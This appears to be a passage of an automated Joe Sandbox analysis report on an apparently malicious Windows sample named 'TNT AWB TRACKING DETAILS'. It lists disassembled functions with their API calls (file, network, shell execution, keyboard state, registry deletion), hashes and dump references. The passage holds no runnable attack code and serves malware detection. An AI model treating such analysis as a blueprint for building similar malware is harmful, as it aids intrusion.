                                                    • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00EFC1C7,00000004,00000000,00000000,00000000), ref: 00EFC21A
                                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00EFC1C7,00000004,00000000,00000000,00000000), ref: 00EFC286
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ShowWindow
                                                    • String ID:
                                                    • API String ID: 1268545403-0
                                                    • Opcode ID: 80ada54b8fa536a9e4da3c4542e31c706d20f76f5f145f0d56974487003338e3
                                                    • Instruction ID: d3285f25dc8cd4aa2a55a39cbf3db70f422576006b981ca69afd705b4d995be7
                                                    • Opcode Fuzzy Hash: 80ada54b8fa536a9e4da3c4542e31c706d20f76f5f145f0d56974487003338e3
                                                    • Instruction Fuzzy Hash: E8412B306046889BDB399B288F88FBB7B91AB55304F34A81DE747765B0C6779847E710
                                                    Function 00F270C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 00F270DD
                                                      • Part of subcall function 00EE0DB6: std::exception::exception.LIBCMT ref: 00EE0DEC
                                                      • Part of subcall function 00EE0DB6: __CxxThrowException@8.LIBCMT ref: 00EE0E01
                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00F27114
                                                    • EnterCriticalSection.KERNEL32(?), ref: 00F27130
                                                    • _memmove.LIBCMT ref: 00F2717E
                                                    • _memmove.LIBCMT ref: 00F2719B
                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00F271AA
                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00F271BF
                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00F271DE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                    • String ID:
                                                    • API String ID: 256516436-0
                                                    • Opcode ID: a403687547eb5a20dbf2fd206f094ed84a7ac3a163ee5d2d9267b23a983e9975
                                                    • Instruction ID: 8bc5fde28dc839c90fb61422a1bd940136d8437d9a651a6e14c404047c27ad9c
                                                    • Opcode Fuzzy Hash: a403687547eb5a20dbf2fd206f094ed84a7ac3a163ee5d2d9267b23a983e9975
                                                    • Instruction Fuzzy Hash: D4318B35900209EBCF00EFA5DC85AABB7B8EF45310F1440B5FD08AB256DBB09E54DBA0
                                                    Function 00F461D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DeleteObject.GDI32(00000000), ref: 00F461EB
                                                    • GetDC.USER32(00000000), ref: 00F461F3
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F461FE
                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00F4620A
                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00F46246
                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00F46257
                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00F4902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00F46291
                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00F462B1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                    • String ID:
                                                    • API String ID: 3864802216-0
                                                    • Opcode ID: 63f0a1549a6df28a8adb4fd04f4a3e7b639488578f3b97566ee954a1916d7b7f
                                                    • Instruction ID: 29bc7c12d6ca3aecbad2ddfeda29ac3a7b30f5847bc7cbac44d37c390be887ad
                                                    • Opcode Fuzzy Hash: 63f0a1549a6df28a8adb4fd04f4a3e7b639488578f3b97566ee954a1916d7b7f
                                                    • Instruction Fuzzy Hash: 1C318976201214BFEF118F10CC8AFEB3FA9EF5A765F050065FE08DA292C6B59845DB60
                                                    Function 00F1BBAF Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: _memcmp
                                                    • String ID:
                                                    • API String ID: 2931989736-0
                                                    • Opcode ID: 39a667434fce3f248c721d23fd3f9566c6afe6c3f9b660ba9f90ded2e772a64c
                                                    • Instruction ID: 0d5a0d6aef5a938f537c01f59bc5ed67cd43d647d1f698bacc860e18c0fc1582
                                                    • Opcode Fuzzy Hash: 39a667434fce3f248c721d23fd3f9566c6afe6c3f9b660ba9f90ded2e772a64c
                                                    • Instruction Fuzzy Hash: 4021D772A0520EBBE208A6129D52FFB739D9E51368F044014FE04A6783EB24DE95A1E2
                                                    Function 00F2EB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00EC9837: __itow.LIBCMT ref: 00EC9862
                                                      • Part of subcall function 00EC9837: __swprintf.LIBCMT ref: 00EC98AC
                                                      • Part of subcall function 00EDFC86: _wcscpy.LIBCMT ref: 00EDFCA9
                                                    • _wcstok.LIBCMT ref: 00F2EC94
                                                    • _wcscpy.LIBCMT ref: 00F2ED23
                                                    • _memset.LIBCMT ref: 00F2ED56
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                    • String ID: X
                                                    • API String ID: 774024439-3081909835
                                                    • Opcode ID: 449fe34a2efc327c3c7529955c047d01029d51e20b82ed9795541f077447e7e6
                                                    • Instruction ID: d049b60ad6332e0e99d800078120feb95bdc30904a9a71495bde81f6d0a4b30b
                                                    • Opcode Fuzzy Hash: 449fe34a2efc327c3c7529955c047d01029d51e20b82ed9795541f077447e7e6
                                                    • Instruction Fuzzy Hash: C0C1AD715083519FC714EF24D985E6AB7E4FF85320F10492DF899AB2A2DB31EC46DB82
                                                    Function 00F36B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __WSAFDIsSet.WSOCK32(00000000,?), ref: 00F36C00
                                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00F36C21
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00F36C34
                                                    • htons.WSOCK32(?), ref: 00F36CEA
                                                    • inet_ntoa.WSOCK32(?), ref: 00F36CA7
                                                      • Part of subcall function 00F1A7E9: _strlen.LIBCMT ref: 00F1A7F3
                                                      • Part of subcall function 00F1A7E9: _memmove.LIBCMT ref: 00F1A815
                                                    • _strlen.LIBCMT ref: 00F36D44
                                                    • _memmove.LIBCMT ref: 00F36DAD
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                    • String ID:
                                                    • API String ID: 3619996494-0
                                                    • Opcode ID: 10ac0ef02e89b25600112cf62b13672f7ffcd147f42516b41bad8aabc839cf41
                                                    • Instruction ID: 3ec5453af9312eeb46751d745d0a40e479421415f56444cf0eec53013bd9585a
                                                    • Opcode Fuzzy Hash: 10ac0ef02e89b25600112cf62b13672f7ffcd147f42516b41bad8aabc839cf41
                                                    • Instruction Fuzzy Hash: C081D172604300BBC710EB24CD86F6BB7E8AF84724F10891CF955EB292DA71ED45DB52
                                                    Function 00EC1424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9490784fdc123d42c80e27955cee702072eb9816c57b2e4d12eb696b3882497f
                                                    • Instruction ID: 3b9a0ad755d384cf2811be2cfe2f1db070e20b3d8f1129ac3e0b72c4f190bea4
                                                    • Opcode Fuzzy Hash: 9490784fdc123d42c80e27955cee702072eb9816c57b2e4d12eb696b3882497f
                                                    • Instruction Fuzzy Hash: 41718E34900119EFCB04DF98CD44EBEBB79FF86314F108199F915BA252C735AA52CB60
                                                    Function 00F4B351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • IsWindow.USER32(01855758), ref: 00F4B3EB
                                                    • IsWindowEnabled.USER32(01855758), ref: 00F4B3F7
                                                    • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00F4B4DB
                                                    • SendMessageW.USER32(01855758,000000B0,?,?), ref: 00F4B512
                                                    • IsDlgButtonChecked.USER32(?,?), ref: 00F4B54F
                                                    • GetWindowLongW.USER32(01855758,000000EC), ref: 00F4B571
                                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00F4B589
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                    • String ID:
                                                    • API String ID: 4072528602-0
                                                    • Opcode ID: 2ef30781f8e18397a1bdc950e8ed48b285cd7cab650dc421c81cd2574595f4a4
                                                    • Instruction ID: cbb13ead46e869f3e386cd82768d8ef1e4c34ca3f9ede735920c24b9669d8608
                                                    • Opcode Fuzzy Hash: 2ef30781f8e18397a1bdc950e8ed48b285cd7cab650dc421c81cd2574595f4a4
                                                    • Instruction Fuzzy Hash: 9B718C34A04208AFDB24DF95C894FBABFB9EF1A320F144059ED45972A3C736E951EB50
                                                    Function 00F3F41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F3F448
                                                    • _memset.LIBCMT ref: 00F3F511
                                                    • ShellExecuteExW.SHELL32(?), ref: 00F3F556
                                                      • Part of subcall function 00EC9837: __itow.LIBCMT ref: 00EC9862
                                                      • Part of subcall function 00EC9837: __swprintf.LIBCMT ref: 00EC98AC
                                                      • Part of subcall function 00EDFC86: _wcscpy.LIBCMT ref: 00EDFCA9
                                                    • GetProcessId.KERNEL32(00000000), ref: 00F3F5CD
                                                    • CloseHandle.KERNEL32(00000000), ref: 00F3F5FC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                    • String ID: @
                                                    • API String ID: 3522835683-2766056989
                                                    • Opcode ID: 25e7cb52d704a8fa67d8b833f440fda85fac54cfc761322bb71e143bfa62ff39
                                                    • Instruction ID: 740c5c883e170b986083df09e1f840f5bbf14b506329c1046d96fcb06c5562f4
                                                    • Opcode Fuzzy Hash: 25e7cb52d704a8fa67d8b833f440fda85fac54cfc761322bb71e143bfa62ff39
                                                    • Instruction Fuzzy Hash: 42618A75E006199FCB04DFA4C985AAEBBF5FF49320F148069E85ABB351CB31AD45CB90
                                                    Function 00F20F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetParent.USER32(?), ref: 00F20F8C
                                                    • GetKeyboardState.USER32(?), ref: 00F20FA1
                                                    • SetKeyboardState.USER32(?), ref: 00F21002
                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 00F21030
                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 00F2104F
                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 00F21095
                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00F210B8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: MessagePost$KeyboardState$Parent
                                                    • String ID:
                                                    • API String ID: 87235514-0
                                                    • Opcode ID: 24f8fc3e58e8b4d8e78c8db27be5a0a4f4e05ed9036086679d4f9bd139b2470a
                                                    • Instruction ID: d1b217d36f07f5166150c591d706c5c7ae8dba8445235a30a15e8ddd94d02430
                                                    • Opcode Fuzzy Hash: 24f8fc3e58e8b4d8e78c8db27be5a0a4f4e05ed9036086679d4f9bd139b2470a
                                                    • Instruction Fuzzy Hash: D6513660A447E53DFB368234DC05BB6BEA9AB16310F088589F1D4458D3C6E8ECD8F765
                                                    Function 00F20D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetParent.USER32(00000000), ref: 00F20DA5
                                                    • GetKeyboardState.USER32(?), ref: 00F20DBA
                                                    • SetKeyboardState.USER32(?), ref: 00F20E1B
                                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00F20E47
                                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00F20E64
                                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00F20EA8
                                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00F20EC9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: MessagePost$KeyboardState$Parent
                                                    • String ID:
                                                    • API String ID: 87235514-0
                                                    • Opcode ID: 673251b25d04e8eca07c3da9f7f0994f9792e79597fd3ec664d697ef06cd0296
                                                    • Instruction ID: 481b10fafabcf99f5c6b04066fce91515f4325d6b93baff8d318eafbdcbd1bc3
                                                    • Opcode Fuzzy Hash: 673251b25d04e8eca07c3da9f7f0994f9792e79597fd3ec664d697ef06cd0296
                                                    • Instruction Fuzzy Hash: 145119A29457E57DFB3243749C45B7A7F99AB06310F084889F1D44A4C3DB95ACC8F750
                                                    Function 00F255FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: _wcsncpy$LocalTime
                                                    • String ID:
                                                    • API String ID: 2945705084-0
                                                    • Opcode ID: 7f8630ed9f2376e0a9e29b6eeae4c4f4dde465bb6ee74ea8aa59dbbc2f02b070
                                                    • Instruction ID: 7a8a828de6405a205a65c039fde1525355c9f74c2add293cc510e836071b03fb
                                                    • Opcode Fuzzy Hash: 7f8630ed9f2376e0a9e29b6eeae4c4f4dde465bb6ee74ea8aa59dbbc2f02b070
                                                    • Instruction Fuzzy Hash: 4B41C465C1025C76CB11EBB59C4A9CFB7FC9F04310F509866E608F3221FB34A245C7AA
                                                    Function 00F23671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00F2466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F23697,?), ref: 00F2468B
                                                      • Part of subcall function 00F2466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F23697,?), ref: 00F246A4
                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00F236B7
                                                    • _wcscmp.LIBCMT ref: 00F236D3
                                                    • MoveFileW.KERNEL32(?,?), ref: 00F236EB
                                                    • _wcscat.LIBCMT ref: 00F23733
                                                    • SHFileOperationW.SHELL32(?), ref: 00F2379F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                    • String ID: \*.*
                                                    • API String ID: 1377345388-1173974218
                                                    • Opcode ID: a8e7b64f9e9a6dcb2e9d912e70b1ce297968b98c1024e8ff1c6197854fc53a28
                                                    • Instruction ID: 3a98f42f88d404ff926db6ba8f4308aa5ca7e6671cd38b9eee5bd01132979d58
                                                    • Opcode Fuzzy Hash: a8e7b64f9e9a6dcb2e9d912e70b1ce297968b98c1024e8ff1c6197854fc53a28
                                                    • Instruction Fuzzy Hash: DC41B6B1508358AEC751EF64D841ADF7BECEF89390F10182EF49AC3151EA38D689DB52
                                                    Function 00F47291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F472AA
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F47351
                                                    • IsMenu.USER32(?), ref: 00F47369
                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00F473B1
                                                    • DrawMenuBar.USER32 ref: 00F473C4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Menu$Item$DrawInfoInsert_memset
                                                    • String ID: 0
                                                    • API String ID: 3866635326-4108050209
                                                    • Opcode ID: 28e6cab46ce7001a1ed02ffa05b76ae3cf6e58379d6b91640339e6cb2191419f
                                                    • Instruction ID: 656da461d99a6fcb3c6046accb058b4a075f038cd1833fc6c85eea6a331e97aa
                                                    • Opcode Fuzzy Hash: 28e6cab46ce7001a1ed02ffa05b76ae3cf6e58379d6b91640339e6cb2191419f
                                                    • Instruction Fuzzy Hash: 04411775A04308EFDB20EF60D884AAABBF8FB05320F149529FD15A7250D730AD54EF50
                                                    Function 00F40FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00F40FD4
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F40FFE
                                                    • FreeLibrary.KERNEL32(00000000), ref: 00F410B5
                                                      • Part of subcall function 00F40FA5: RegCloseKey.ADVAPI32(?), ref: 00F4101B
                                                      • Part of subcall function 00F40FA5: FreeLibrary.KERNEL32(?), ref: 00F4106D
                                                      • Part of subcall function 00F40FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00F41090
                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00F41058
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
